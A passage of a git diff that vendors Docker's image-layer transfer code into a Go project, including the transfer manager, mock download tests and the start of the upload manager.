+	var (
+		parent layer.Layer
+		err    error
+	)
+
+	if parentID != "" {
+		parent, err = ls.Get(parentID)
+		if err != nil {
+			return nil, err
+		}
+	}
+
+	l := &mockLayer{parent: parent}
+	_, err = l.layerData.ReadFrom(reader)
+	if err != nil {
+		return nil, err
+	}
+	l.diffID = layer.DiffID(digest.FromBytes(l.layerData.Bytes()))
+	l.chainID = createChainIDFromParent(parentID, l.diffID)
+
+	ls.layers[l.chainID] = l
+	return l, nil
+}
+
+func (ls *mockLayerStore) Get(chainID layer.ChainID) (layer.Layer, error) {
+	l, ok := ls.layers[chainID]
+	if !ok {
+		return nil, layer.ErrLayerDoesNotExist
+	}
+	return l, nil
+}
+
+func (ls *mockLayerStore) Release(l layer.Layer) ([]layer.Metadata, error) {
+	return []layer.Metadata{}, nil
+}
+func (ls *mockLayerStore) CreateRWLayer(string, layer.ChainID, string, layer.MountInit, map[string]string) (layer.RWLayer, error) {
+	return nil, errors.New("not implemented")
+}
+
+func (ls *mockLayerStore) GetRWLayer(string) (layer.RWLayer, error) {
+	return nil, errors.New("not implemented")
+}
+
+func (ls *mockLayerStore) ReleaseRWLayer(layer.RWLayer) ([]layer.Metadata, error) {
+	return nil, errors.New("not implemented")
+}
+func (ls *mockLayerStore) GetMountID(string) (string, error) {
+	return "", errors.New("not implemented")
+}
+
+func (ls *mockLayerStore) Cleanup() error {
+	return nil
+}
+
+func (ls *mockLayerStore) DriverStatus() [][2]string {
+	return [][2]string{}
+}
+
+func (ls *mockLayerStore) DriverName() string {
+	return "mock"
+}
+
+type mockDownloadDescriptor struct {
+	currentDownloads *int32
+	id               string
+	diffID           layer.DiffID
+	registeredDiffID layer.DiffID
+	expectedDiffID   layer.DiffID
+	simulateRetries  int
+}
+
+// Key returns the key used to deduplicate downloads.
+func (d *mockDownloadDescriptor) Key() string {
+	return d.id
+}
+
+// ID returns the ID for display purposes.
+func (d *mockDownloadDescriptor) ID() string {
+	return d.id
+}
+
+// DiffID should return the DiffID for this layer, or an error
+// if it is unknown (for example, if it has not been downloaded
+// before).
+func (d *mockDownloadDescriptor) DiffID() (layer.DiffID, error) {
+	if d.diffID != "" {
+		return d.diffID, nil
+	}
+	return "", errors.New("no diffID available")
+}
+
+func (d *mockDownloadDescriptor) Registered(diffID layer.DiffID) {
+	d.registeredDiffID = diffID
+}
+
+func (d *mockDownloadDescriptor) mockTarStream() io.ReadCloser {
+	// The mock implementation returns the ID repeated 5 times as a tar
+	// stream instead of actual tar data. The data is ignored except for
+	// computing IDs.
+	return ioutil.NopCloser(bytes.NewBuffer([]byte(d.id + d.id + d.id + d.id + d.id)))
+}
+
+// Download is called to perform the download.
+func (d *mockDownloadDescriptor) Download(ctx context.Context, progressOutput progress.Output) (io.ReadCloser, int64, error) {
+	if d.currentDownloads != nil {
+		defer atomic.AddInt32(d.currentDownloads, -1)
+
+		if atomic.AddInt32(d.currentDownloads, 1) > maxDownloadConcurrency {
+			return nil, 0, errors.New("concurrency limit exceeded")
+		}
+	}
+
+	// Sleep a bit to simulate a time-consuming download.
+	for i := int64(0); i <= 10; i++ {
+		select {
+		case <-ctx.Done():
+			return nil, 0, ctx.Err()
+		case <-time.After(10 * time.Millisecond):
+			progressOutput.WriteProgress(progress.Progress{ID: d.ID(), Action: "Downloading", Current: i, Total: 10})
+		}
+	}
+
+	if d.simulateRetries != 0 {
+		d.simulateRetries--
+		return nil, 0, errors.New("simulating retry")
+	}
+
+	return d.mockTarStream(), 0, nil
+}
+
+func (d *mockDownloadDescriptor) Close() {
+}
+
+func downloadDescriptors(currentDownloads *int32) []DownloadDescriptor {
+	return []DownloadDescriptor{
+		&mockDownloadDescriptor{
+			currentDownloads: currentDownloads,
+			id:               "id1",
+			expectedDiffID:   layer.DiffID("sha256:68e2c75dc5c78ea9240689c60d7599766c213ae210434c53af18470ae8c53ec1"),
+		},
+		&mockDownloadDescriptor{
+			currentDownloads: currentDownloads,
+			id:               "id2",
+			expectedDiffID:   layer.DiffID("sha256:64a636223116aa837973a5d9c2bdd17d9b204e4f95ac423e20e65dfbb3655473"),
+		},
+		&mockDownloadDescriptor{
+			currentDownloads: currentDownloads,
+			id:               "id3",
+			expectedDiffID:   layer.DiffID("sha256:58745a8bbd669c25213e9de578c4da5c8ee1c836b3581432c2b50e38a6753300"),
+		},
+		&mockDownloadDescriptor{
+			currentDownloads: currentDownloads,
+			id:               "id2",
+			expectedDiffID:   layer.DiffID("sha256:64a636223116aa837973a5d9c2bdd17d9b204e4f95ac423e20e65dfbb3655473"),
+		},
+		&mockDownloadDescriptor{
+			currentDownloads: currentDownloads,
+			id:               "id4",
+			expectedDiffID:   layer.DiffID("sha256:0dfb5b9577716cc173e95af7c10289322c29a6453a1718addc00c0c5b1330936"),
+			simulateRetries:  1,
+		},
+		&mockDownloadDescriptor{
+			currentDownloads: currentDownloads,
+			id:               "id5",
+			expectedDiffID:   layer.DiffID("sha256:0a5f25fa1acbc647f6112a6276735d0fa01e4ee2aa7ec33015e337350e1ea23d"),
+		},
+	}
+}
+
+func TestSuccessfulDownload(t *testing.T) {
+	// TODO Windows: Fix this unit text
+	if runtime.GOOS == "windows" {
+		t.Skip("Needs fixing on Windows")
+	}
+	layerStore := &mockLayerStore{make(map[layer.ChainID]*mockLayer)}
+	ldm := NewLayerDownloadManager(layerStore, maxDownloadConcurrency)
+
+	progressChan := make(chan progress.Progress)
+	progressDone := make(chan struct{})
+	receivedProgress := make(map[string]progress.Progress)
+
+	go func() {
+		for p := range progressChan {
+			receivedProgress[p.ID] = p
+		}
+		close(progressDone)
+	}()
+
+	var currentDownloads int32
+	descriptors := downloadDescriptors(&currentDownloads)
+
+	firstDescriptor := descriptors[0].(*mockDownloadDescriptor)
+
+	// Pre-register the first layer to simulate an already-existing layer
+	l, err := layerStore.Register(firstDescriptor.mockTarStream(), "")
+	if err != nil {
+		t.Fatal(err)
+	}
+	firstDescriptor.diffID = l.DiffID()
+
+	rootFS, releaseFunc, err := ldm.Download(context.Background(), *image.NewRootFS(), descriptors, progress.ChanOutput(progressChan))
+	if err != nil {
+		t.Fatalf("download error: %v", err)
+	}
+
+	releaseFunc()
+
+	close(progressChan)
+	<-progressDone
+
+	if len(rootFS.DiffIDs) != len(descriptors) {
+		t.Fatal("got wrong number of diffIDs in rootfs")
+	}
+
+	for i, d := range descriptors {
+		descriptor := d.(*mockDownloadDescriptor)
+
+		if descriptor.diffID != "" {
+			if receivedProgress[d.ID()].Action != "Already exists" {
+				t.Fatalf("did not get 'Already exists' message for %v", d.ID())
+			}
+		} else if receivedProgress[d.ID()].Action != "Pull complete" {
+			t.Fatalf("did not get 'Pull complete' message for %v", d.ID())
+		}
+
+		if rootFS.DiffIDs[i] != descriptor.expectedDiffID {
+			t.Fatalf("rootFS item %d has the wrong diffID (expected: %v got: %v)", i, descriptor.expectedDiffID, rootFS.DiffIDs[i])
+		}
+
+		if descriptor.diffID == "" && descriptor.registeredDiffID != rootFS.DiffIDs[i] {
+			t.Fatal("diffID mismatch between rootFS and Registered callback")
+		}
+	}
+}
+
+func TestCancelledDownload(t *testing.T) {
+	ldm := NewLayerDownloadManager(&mockLayerStore{make(map[layer.ChainID]*mockLayer)}, maxDownloadConcurrency)
+
+	progressChan := make(chan progress.Progress)
+	progressDone := make(chan struct{})
+
+	go func() {
+		for range progressChan {
+		}
+		close(progressDone)
+	}()
+
+	ctx, cancel := context.WithCancel(context.Background())
+
+	go func() {
+		<-time.After(time.Millisecond)
+		cancel()
+	}()
+
+	descriptors := downloadDescriptors(nil)
+	_, _, err := ldm.Download(ctx, *image.NewRootFS(), descriptors, progress.ChanOutput(progressChan))
+	if err != context.Canceled {
+		t.Fatal("expected download to be cancelled")
+	}
+
+	close(progressChan)
+	<-progressDone
+}
diff --git a/vendor/github.com/docker/docker/distribution/xfer/transfer.go b/vendor/github.com/docker/docker/distribution/xfer/transfer.go
new file mode 100644
index 0000000000..14f15660ac
--- /dev/null
+++ b/vendor/github.com/docker/docker/distribution/xfer/transfer.go
@@ -0,0 +1,401 @@
+package xfer
+
+import (
+	"runtime"
+	"sync"
+
+	"github.com/docker/docker/pkg/progress"
+	"golang.org/x/net/context"
+)
+
+// DoNotRetry is an error wrapper indicating that the error cannot be resolved
+// with a retry.
+type DoNotRetry struct {
+	Err error
+}
+
+// Error returns the stringified representation of the encapsulated error.
+func (e DoNotRetry) Error() string {
+	return e.Err.Error()
+}
+
+// Watcher is returned by Watch and can be passed to Release to stop watching.
+type Watcher struct {
+	// signalChan is used to signal to the watcher goroutine that
+	// new progress information is available, or that the transfer
+	// has finished.
+	signalChan chan struct{}
+	// releaseChan signals to the watcher goroutine that the watcher
+	// should be detached.
+	releaseChan chan struct{}
+	// running remains open as long as the watcher is watching the
+	// transfer. It gets closed if the transfer finishes or the
+	// watcher is detached.
+	running chan struct{}
+}
+
+// Transfer represents an in-progress transfer.
+type Transfer interface {
+	Watch(progressOutput progress.Output) *Watcher
+	Release(*Watcher)
+	Context() context.Context
+	Close()
+	Done() <-chan struct{}
+	Released() <-chan struct{}
+	Broadcast(masterProgressChan <-chan progress.Progress)
+}
+
+type transfer struct {
+	mu sync.Mutex
+
+	ctx    context.Context
+	cancel context.CancelFunc
+
+	// watchers keeps track of the goroutines monitoring progress output,
+	// indexed by the channels that release them.
+	watchers map[chan struct{}]*Watcher
+
+	// lastProgress is the most recently received progress event.
+	lastProgress progress.Progress
+	// hasLastProgress is true when lastProgress has been set.
+	hasLastProgress bool
+
+	// running remains open as long as the transfer is in progress.
+	running chan struct{}
+	// released stays open until all watchers release the transfer and
+	// the transfer is no longer tracked by the transfer manager.
+	released chan struct{}
+
+	// broadcastDone is true if the master progress channel has closed.
+	broadcastDone bool
+	// closed is true if Close has been called
+	closed bool
+	// broadcastSyncChan allows watchers to "ping" the broadcasting
+	// goroutine to wait for it for deplete its input channel. This ensures
+	// a detaching watcher won't miss an event that was sent before it
+	// started detaching.
+	broadcastSyncChan chan struct{}
+}
+
+// NewTransfer creates a new transfer.
+func NewTransfer() Transfer {
+	t := &transfer{
+		watchers:          make(map[chan struct{}]*Watcher),
+		running:           make(chan struct{}),
+		released:          make(chan struct{}),
+		broadcastSyncChan: make(chan struct{}),
+	}
+
+	// This uses context.Background instead of a caller-supplied context
+	// so that a transfer won't be cancelled automatically if the client
+	// which requested it is ^C'd (there could be other viewers).
+	t.ctx, t.cancel = context.WithCancel(context.Background())
+
+	return t
+}
+
+// Broadcast copies the progress and error output to all viewers.
+func (t *transfer) Broadcast(masterProgressChan <-chan progress.Progress) {
+	for {
+		var (
+			p  progress.Progress
+			ok bool
+		)
+		select {
+		case p, ok = <-masterProgressChan:
+		default:
+			// We've depleted the channel, so now we can handle
+			// reads on broadcastSyncChan to let detaching watchers
+			// know we're caught up.
+			select {
+			case <-t.broadcastSyncChan:
+				continue
+			case p, ok = <-masterProgressChan:
+			}
+		}
+
+		t.mu.Lock()
+		if ok {
+			t.lastProgress = p
+			t.hasLastProgress = true
+			for _, w := range t.watchers {
+				select {
+				case w.signalChan <- struct{}{}:
+				default:
+				}
+			}
+		} else {
+			t.broadcastDone = true
+		}
+		t.mu.Unlock()
+		if !ok {
+			close(t.running)
+			return
+		}
+	}
+}
+
+// Watch adds a watcher to the transfer. The supplied channel gets progress
+// updates and is closed when the transfer finishes.
+func (t *transfer) Watch(progressOutput progress.Output) *Watcher {
+	t.mu.Lock()
+	defer t.mu.Unlock()
+
+	w := &Watcher{
+		releaseChan: make(chan struct{}),
+		signalChan:  make(chan struct{}),
+		running:     make(chan struct{}),
+	}
+
+	t.watchers[w.releaseChan] = w
+
+	if t.broadcastDone {
+		close(w.running)
+		return w
+	}
+
+	go func() {
+		defer func() {
+			close(w.running)
+		}()
+		var (
+			done           bool
+			lastWritten    progress.Progress
+			hasLastWritten bool
+		)
+		for {
+			t.mu.Lock()
+			hasLastProgress := t.hasLastProgress
+			lastProgress := t.lastProgress
+			t.mu.Unlock()
+
+			// Make sure we don't write the last progress item
+			// twice.
+			if hasLastProgress && (!done || !hasLastWritten || lastProgress != lastWritten) {
+				progressOutput.WriteProgress(lastProgress)
+				lastWritten = lastProgress
+				hasLastWritten = true
+			}
+
+			if done {
+				return
+			}
+
+			select {
+			case <-w.signalChan:
+			case <-w.releaseChan:
+				done = true
+				// Since the watcher is going to detach, make
+				// sure the broadcaster is caught up so we
+				// don't miss anything.
+				select {
+				case t.broadcastSyncChan <- struct{}{}:
+				case <-t.running:
+				}
+			case <-t.running:
+				done = true
+			}
+		}
+	}()
+
+	return w
+}
+
+// Release is the inverse of Watch; indicating that the watcher no longer wants
+// to be notified about the progress of the transfer. All calls to Watch must
+// be paired with later calls to Release so that the lifecycle of the transfer
+// is properly managed.
+func (t *transfer) Release(watcher *Watcher) {
+	t.mu.Lock()
+	delete(t.watchers, watcher.releaseChan)
+
+	if len(t.watchers) == 0 {
+		if t.closed {
+			// released may have been closed already if all
+			// watchers were released, then another one was added
+			// while waiting for a previous watcher goroutine to
+			// finish.
+			select {
+			case <-t.released:
+			default:
+				close(t.released)
+			}
+		} else {
+			t.cancel()
+		}
+	}
+	t.mu.Unlock()
+
+	close(watcher.releaseChan)
+	// Block until the watcher goroutine completes
+	<-watcher.running
+}
+
+// Done returns a channel which is closed if the transfer completes or is
+// cancelled. Note that having 0 watchers causes a transfer to be cancelled.
+func (t *transfer) Done() <-chan struct{} {
+	// Note that this doesn't return t.ctx.Done() because that channel will
+	// be closed the moment Cancel is called, and we need to return a
+	// channel that blocks until a cancellation is actually acknowledged by
+	// the transfer function.
+	return t.running
+}
+
+// Released returns a channel which is closed once all watchers release the
+// transfer AND the transfer is no longer tracked by the transfer manager.
+func (t *transfer) Released() <-chan struct{} {
+	return t.released
+}
+
+// Context returns the context associated with the transfer.
+func (t *transfer) Context() context.Context {
+	return t.ctx
+}
+
+// Close is called by the transfer manager when the transfer is no longer
+// being tracked.
+func (t *transfer) Close() {
+	t.mu.Lock()
+	t.closed = true
+	if len(t.watchers) == 0 {
+		close(t.released)
+	}
+	t.mu.Unlock()
+}
+
+// DoFunc is a function called by the transfer manager to actually perform
+// a transfer. It should be non-blocking. It should wait until the start channel
+// is closed before transferring any data. If the function closes inactive, that
+// signals to the transfer manager that the job is no longer actively moving
+// data - for example, it may be waiting for a dependent transfer to finish.
+// This prevents it from taking up a slot.
+type DoFunc func(progressChan chan<- progress.Progress, start <-chan struct{}, inactive chan<- struct{}) Transfer
+
+// TransferManager is used by LayerDownloadManager and LayerUploadManager to
+// schedule and deduplicate transfers. It is up to the TransferManager
+// implementation to make the scheduling and concurrency decisions.
+type TransferManager interface {
+	// Transfer checks if a transfer with the given key is in progress. If
+	// so, it returns progress and error output from that transfer.
+	// Otherwise, it will call xferFunc to initiate the transfer.
+	Transfer(key string, xferFunc DoFunc, progressOutput progress.Output) (Transfer, *Watcher)
+	// SetConcurrency set the concurrencyLimit so that it is adjustable daemon reload
+	SetConcurrency(concurrency int)
+}
+
+type transferManager struct {
+	mu sync.Mutex
+
+	concurrencyLimit int
+	activeTransfers  int
+	transfers        map[string]Transfer
+	waitingTransfers []chan struct{}
+}
+
+// NewTransferManager returns a new TransferManager.
+func NewTransferManager(concurrencyLimit int) TransferManager {
+	return &transferManager{
+		concurrencyLimit: concurrencyLimit,
+		transfers:        make(map[string]Transfer),
+	}
+}
+
+// SetConcurrency set the concurrencyLimit
+func (tm *transferManager) SetConcurrency(concurrency int) {
+	tm.mu.Lock()
+	tm.concurrencyLimit = concurrency
+	tm.mu.Unlock()
+}
+
+// Transfer checks if a transfer matching the given key is in progress. If not,
+// it starts one by calling xferFunc. The caller supplies a channel which
+// receives progress output from the transfer.
+func (tm *transferManager) Transfer(key string, xferFunc DoFunc, progressOutput progress.Output) (Transfer, *Watcher) {
+	tm.mu.Lock()
+	defer tm.mu.Unlock()
+
+	for {
+		xfer, present := tm.transfers[key]
+		if !present {
+			break
+		}
+		// Transfer is already in progress.
+		watcher := xfer.Watch(progressOutput)
+
+		select {
+		case <-xfer.Context().Done():
+			// We don't want to watch a transfer that has been cancelled.
+			// Wait for it to be removed from the map and try again.
+			xfer.Release(watcher)
+			tm.mu.Unlock()
+			// The goroutine that removes this transfer from the
+			// map is also waiting for xfer.Done(), so yield to it.
+			// This could be avoided by adding a Closed method
+			// to Transfer to allow explicitly waiting for it to be
+			// removed the map, but forcing a scheduling round in
+			// this very rare case seems better than bloating the
+			// interface definition.
+			runtime.Gosched()
+			<-xfer.Done()
+			tm.mu.Lock()
+		default:
+			return xfer, watcher
+		}
+	}
+
+	start := make(chan struct{})
+	inactive := make(chan struct{})
+
+	if tm.concurrencyLimit == 0 || tm.activeTransfers < tm.concurrencyLimit {
+		close(start)
+		tm.activeTransfers++
+	} else {
+		tm.waitingTransfers = append(tm.waitingTransfers, start)
+	}
+
+	masterProgressChan := make(chan progress.Progress)
+	xfer := xferFunc(masterProgressChan, start, inactive)
+	watcher := xfer.Watch(progressOutput)
+	go xfer.Broadcast(masterProgressChan)
+	tm.transfers[key] = xfer
+
+	// When the transfer is finished, remove from the map.
+	go func() {
+		for {
+			select {
+			case <-inactive:
+				tm.mu.Lock()
+				tm.inactivate(start)
+				tm.mu.Unlock()
+				inactive = nil
+			case <-xfer.Done():
+				tm.mu.Lock()
+				if inactive != nil {
+					tm.inactivate(start)
+				}
+				delete(tm.transfers, key)
+				tm.mu.Unlock()
+				xfer.Close()
+				return
+			}
+		}
+	}()
+
+	return xfer, watcher
+}
+
+func (tm *transferManager) inactivate(start chan struct{}) {
+	// If the transfer was started, remove it from the activeTransfers
+	// count.
+	select {
+	case <-start:
+		// Start next transfer if any are waiting
+		if len(tm.waitingTransfers) != 0 {
+			close(tm.waitingTransfers[0])
+			tm.waitingTransfers = tm.waitingTransfers[1:]
+		} else {
+			tm.activeTransfers--
+		}
+	default:
+	}
+}
diff --git a/vendor/github.com/docker/docker/distribution/xfer/transfer_test.go b/vendor/github.com/docker/docker/distribution/xfer/transfer_test.go
new file mode 100644
index 0000000000..6c50ce3524
--- /dev/null
+++ b/vendor/github.com/docker/docker/distribution/xfer/transfer_test.go
@@ -0,0 +1,410 @@
+package xfer
+
+import (
+	"sync/atomic"
+	"testing"
+	"time"
+
+	"github.com/docker/docker/pkg/progress"
+)
+
+func TestTransfer(t *testing.T) {
+	makeXferFunc := func(id string) DoFunc {
+		return func(progressChan chan<- progress.Progress, start <-chan struct{}, inactive chan<- struct{}) Transfer {
+			select {
+			case <-start:
+			default:
+				t.Fatalf("transfer function not started even though concurrency limit not reached")
+			}
+
+			xfer := NewTransfer()
+			go func() {
+				for i := 0; i <= 10; i++ {
+					progressChan <- progress.Progress{ID: id, Action: "testing", Current: int64(i), Total: 10}
+					time.Sleep(10 * time.Millisecond)
+				}
+				close(progressChan)
+			}()
+			return xfer
+		}
+	}
+
+	tm := NewTransferManager(5)
+	progressChan := make(chan progress.Progress)
+	progressDone := make(chan struct{})
+	receivedProgress := make(map[string]int64)
+
+	go func() {
+		for p := range progressChan {
+			val, present := receivedProgress[p.ID]
+			if present && p.Current <= val {
+				t.Fatalf("got unexpected progress value: %d (expected %d)", p.Current, val+1)
+			}
+			receivedProgress[p.ID] = p.Current
+		}
+		close(progressDone)
+	}()
+
+	// Start a few transfers
+	ids := []string{"id1", "id2", "id3"}
+	xfers := make([]Transfer, len(ids))
+	watchers := make([]*Watcher, len(ids))
+	for i, id := range ids {
+		xfers[i], watchers[i] = tm.Transfer(id, makeXferFunc(id), progress.ChanOutput(progressChan))
+	}
+
+	for i, xfer := range xfers {
+		<-xfer.Done()
+		xfer.Release(watchers[i])
+	}
+	close(progressChan)
+	<-progressDone
+
+	for _, id := range ids {
+		if receivedProgress[id] != 10 {
+			t.Fatalf("final progress value %d instead of 10", receivedProgress[id])
+		}
+	}
+}
+
+func TestConcurrencyLimit(t *testing.T) {
+	concurrencyLimit := 3
+	var runningJobs int32
+
+	makeXferFunc := func(id string) DoFunc {
+		return func(progressChan chan<- progress.Progress, start <-chan struct{}, inactive chan<- struct{}) Transfer {
+			xfer := NewTransfer()
+			go func() {
+				<-start
+				totalJobs := atomic.AddInt32(&runningJobs, 1)
+				if int(totalJobs) > concurrencyLimit {
+					t.Fatalf("too many jobs running")
+				}
+				for i := 0; i <= 10; i++ {
+					progressChan <- progress.Progress{ID: id, Action: "testing", Current: int64(i), Total: 10}
+					time.Sleep(10 * time.Millisecond)
+				}
+				atomic.AddInt32(&runningJobs, -1)
+				close(progressChan)
+			}()
+			return xfer
+		}
+	}
+
+	tm := NewTransferManager(concurrencyLimit)
+	progressChan := make(chan progress.Progress)
+	progressDone := make(chan struct{})
+	receivedProgress := make(map[string]int64)
+
+	go func() {
+		for p := range progressChan {
+			receivedProgress[p.ID] = p.Current
+		}
+		close(progressDone)
+	}()
+
+	// Start more transfers than the concurrency limit
+	ids := []string{"id1", "id2", "id3", "id4", "id5", "id6", "id7", "id8"}
+	xfers := make([]Transfer, len(ids))
+	watchers := make([]*Watcher, len(ids))
+	for i, id := range ids {
+		xfers[i], watchers[i] = tm.Transfer(id, makeXferFunc(id), progress.ChanOutput(progressChan))
+	}
+
+	for i, xfer := range xfers {
+		<-xfer.Done()
+		xfer.Release(watchers[i])
+	}
+	close(progressChan)
+	<-progressDone
+
+	for _, id := range ids {
+		if receivedProgress[id] != 10 {
+			t.Fatalf("final progress value %d instead of 10", receivedProgress[id])
+		}
+	}
+}
+
+func TestInactiveJobs(t *testing.T) {
+	concurrencyLimit := 3
+	var runningJobs int32
+	testDone := make(chan struct{})
+
+	makeXferFunc := func(id string) DoFunc {
+		return func(progressChan chan<- progress.Progress, start <-chan struct{}, inactive chan<- struct{}) Transfer {
+			xfer := NewTransfer()
+			go func() {
+				<-start
+				totalJobs := atomic.AddInt32(&runningJobs, 1)
+				if int(totalJobs) > concurrencyLimit {
+					t.Fatalf("too many jobs running")
+				}
+				for i := 0; i <= 10; i++ {
+					progressChan <- progress.Progress{ID: id, Action: "testing", Current: int64(i), Total: 10}
+					time.Sleep(10 * time.Millisecond)
+				}
+				atomic.AddInt32(&runningJobs, -1)
+				close(inactive)
+				<-testDone
+				close(progressChan)
+			}()
+			return xfer
+		}
+	}
+
+	tm := NewTransferManager(concurrencyLimit)
+	progressChan := make(chan progress.Progress)
+	progressDone := make(chan struct{})
+	receivedProgress := make(map[string]int64)
+
+	go func() {
+		for p := range progressChan {
+			receivedProgress[p.ID] = p.Current
+		}
+		close(progressDone)
+	}()
+
+	// Start more transfers than the concurrency limit
+	ids := []string{"id1", "id2", "id3", "id4", "id5", "id6", "id7", "id8"}
+	xfers := make([]Transfer, len(ids))
+	watchers := make([]*Watcher, len(ids))
+	for i, id := range ids {
+		xfers[i], watchers[i] = tm.Transfer(id, makeXferFunc(id), progress.ChanOutput(progressChan))
+	}
+
+	close(testDone)
+	for i, xfer := range xfers {
+		<-xfer.Done()
+		xfer.Release(watchers[i])
+	}
+	close(progressChan)
+	<-progressDone
+
+	for _, id := range ids {
+		if receivedProgress[id] != 10 {
+			t.Fatalf("final progress value %d instead of 10", receivedProgress[id])
+		}
+	}
+}
+
+func TestWatchRelease(t *testing.T) {
+	ready := make(chan struct{})
+
+	makeXferFunc := func(id string) DoFunc {
+		return func(progressChan chan<- progress.Progress, start <-chan struct{}, inactive chan<- struct{}) Transfer {
+			xfer := NewTransfer()
+			go func() {
+				defer func() {
+					close(progressChan)
+				}()
+				<-ready
+				for i := int64(0); ; i++ {
+					select {
+					case <-time.After(10 * time.Millisecond):
+					case <-xfer.Context().Done():
+						return
+					}
+					progressChan <- progress.Progress{ID: id, Action: "testing", Current: i, Total: 10}
+				}
+			}()
+			return xfer
+		}
+	}
+
+	tm := NewTransferManager(5)
+
+	type watcherInfo struct {
+		watcher               *Watcher
+		progressChan          chan progress.Progress
+		progressDone          chan struct{}
+		receivedFirstProgress chan struct{}
+	}
+
+	progressConsumer := func(w watcherInfo) {
+		first := true
+		for range w.progressChan {
+			if first {
+				close(w.receivedFirstProgress)
+			}
+			first = false
+		}
+		close(w.progressDone)
+	}
+
+	// Start a transfer
+	watchers := make([]watcherInfo, 5)
+	var xfer Transfer
+	watchers[0].progressChan = make(chan progress.Progress)
+	watchers[0].progressDone = make(chan struct{})
+	watchers[0].receivedFirstProgress = make(chan struct{})
+	xfer, watchers[0].watcher = tm.Transfer("id1", makeXferFunc("id1"), progress.ChanOutput(watchers[0].progressChan))
+	go progressConsumer(watchers[0])
+
+	// Give it multiple watchers
+	for i := 1; i != len(watchers); i++ {
+		watchers[i].progressChan = make(chan progress.Progress)
+		watchers[i].progressDone = make(chan struct{})
+		watchers[i].receivedFirstProgress = make(chan struct{})
+		watchers[i].watcher = xfer.Watch(progress.ChanOutput(watchers[i].progressChan))
+		go progressConsumer(watchers[i])
+	}
+
+	// Now that the watchers are set up, allow the transfer goroutine to
+	// proceed.
+	close(ready)
+
+	// Confirm that each watcher gets progress output.
+	for _, w := range watchers {
+		<-w.receivedFirstProgress
+	}
+
+	// Release one watcher every 5ms
+	for _, w := range watchers {
+		xfer.Release(w.watcher)
+		<-time.After(5 * time.Millisecond)
+	}
+
+	// Now that all watchers have been released, Released() should
+	// return a closed channel.
+	<-xfer.Released()
+
+	// Done() should return a closed channel because the xfer func returned
+	// due to cancellation.
+	<-xfer.Done()
+
+	for _, w := range watchers {
+		close(w.progressChan)
+		<-w.progressDone
+	}
+}
+
+func TestWatchFinishedTransfer(t *testing.T) {
+	makeXferFunc := func(id string) DoFunc {
+		return func(progressChan chan<- progress.Progress, start <-chan struct{}, inactive chan<- struct{}) Transfer {
+			xfer := NewTransfer()
+			go func() {
+				// Finish immediately
+				close(progressChan)
+			}()
+			return xfer
+		}
+	}
+
+	tm := NewTransferManager(5)
+
+	// Start a transfer
+	watchers := make([]*Watcher, 3)
+	var xfer Transfer
+	xfer, watchers[0] = tm.Transfer("id1", makeXferFunc("id1"), progress.ChanOutput(make(chan progress.Progress)))
+
+	// Give it a watcher immediately
+	watchers[1] = xfer.Watch(progress.ChanOutput(make(chan progress.Progress)))
+
+	// Wait for the transfer to complete
+	<-xfer.Done()
+
+	// Set up another watcher
+	watchers[2] = xfer.Watch(progress.ChanOutput(make(chan progress.Progress)))
+
+	// Release the watchers
+	for _, w := range watchers {
+		xfer.Release(w)
+	}
+
+	// Now that all watchers have been released, Released() should
+	// return a closed channel.
+	<-xfer.Released()
+}
+
+func TestDuplicateTransfer(t *testing.T) {
+	ready := make(chan struct{})
+
+	var xferFuncCalls int32
+
+	makeXferFunc := func(id string) DoFunc {
+		return func(progressChan chan<- progress.Progress, start <-chan struct{}, inactive chan<- struct{}) Transfer {
+			atomic.AddInt32(&xferFuncCalls, 1)
+			xfer := NewTransfer()
+			go func() {
+				defer func() {
+					close(progressChan)
+				}()
+				<-ready
+				for i := int64(0); ; i++ {
+					select {
+					case <-time.After(10 * time.Millisecond):
+					case <-xfer.Context().Done():
+						return
+					}
+					progressChan <- progress.Progress{ID: id, Action: "testing", Current: i, Total: 10}
+				}
+			}()
+			return xfer
+		}
+	}
+
+	tm := NewTransferManager(5)
+
+	type transferInfo struct {
+		xfer                  Transfer
+		watcher               *Watcher
+		progressChan          chan progress.Progress
+		progressDone          chan struct{}
+		receivedFirstProgress chan struct{}
+	}
+
+	progressConsumer := func(t transferInfo) {
+		first := true
+		for range t.progressChan {
+			if first {
+				close(t.receivedFirstProgress)
+			}
+			first = false
+		}
+		close(t.progressDone)
+	}
+
+	// Try to start multiple transfers with the same ID
+	transfers := make([]transferInfo, 5)
+	for i := range transfers {
+		t := &transfers[i]
+		t.progressChan = make(chan progress.Progress)
+		t.progressDone = make(chan struct{})
+		t.receivedFirstProgress = make(chan struct{})
+		t.xfer, t.watcher = tm.Transfer("id1", makeXferFunc("id1"), progress.ChanOutput(t.progressChan))
+		go progressConsumer(*t)
+	}
+
+	// Allow the transfer goroutine to proceed.
+	close(ready)
+
+	// Confirm that each watcher gets progress output.
+	for _, t := range transfers {
+		<-t.receivedFirstProgress
+	}
+
+	// Confirm that the transfer function was called exactly once.
+	if xferFuncCalls != 1 {
+		t.Fatal("transfer function wasn't called exactly once")
+	}
+
+	// Release one watcher every 5ms
+	for _, t := range transfers {
+		t.xfer.Release(t.watcher)
+		<-time.After(5 * time.Millisecond)
+	}
+
+	for _, t := range transfers {
+		// Now that all watchers have been released, Released() should
+		// return a closed channel.
+		<-t.xfer.Released()
+		// Done() should return a closed channel because the xfer func returned
+		// due to cancellation.
+		<-t.xfer.Done()
+	}
+
+	for _, t := range transfers {
+		close(t.progressChan)
+		<-t.progressDone
+	}
+}
diff --git a/vendor/github.com/docker/docker/distribution/xfer/upload.go b/vendor/github.com/docker/docker/distribution/xfer/upload.go
new file mode 100644
index 0000000000..ad3398369c
--- /dev/null
+++ b/vendor/github.com/docker/docker/distribution/xfer/upload.go
@@ -0,0 +1,168 @@
+package xfer
+
+import (
+	"errors"
+	"time"
+
+	"github.com/Sirupsen/logrus"
+	"github.com/docker/distribution"
+	"github.com/docker/docker/layer"
+	"github.com/docker/docker/pkg/progress"
+	"golang.org/x/net/context"
+)
+
+const maxUploadAttempts = 5
+
+// LayerUploadManager provides task management and progress reporting for
+// uploads.
+type LayerUploadManager struct {
+	tm TransferManager
+}
+
+// SetConcurrency set the max concurrent uploads for each push
+func (lum *LayerUploadManager) SetConcurrency(concurrency int) {
+	lum.tm.SetConcurrency(concurrency)
+}
+
+// NewLayerUploadManager returns a new LayerUploadManager.
+func NewLayerUploadManager(concurrencyLimit int) *LayerUploadManager {
+	return &LayerUploadManager{
+		tm: NewTransferManager(concurrencyLimit),
+	}
+}
+
+type uploadTransfer struct {
+	Transfer
+
+	remoteDescriptor distribution.Descriptor
+	err              error
+}
+
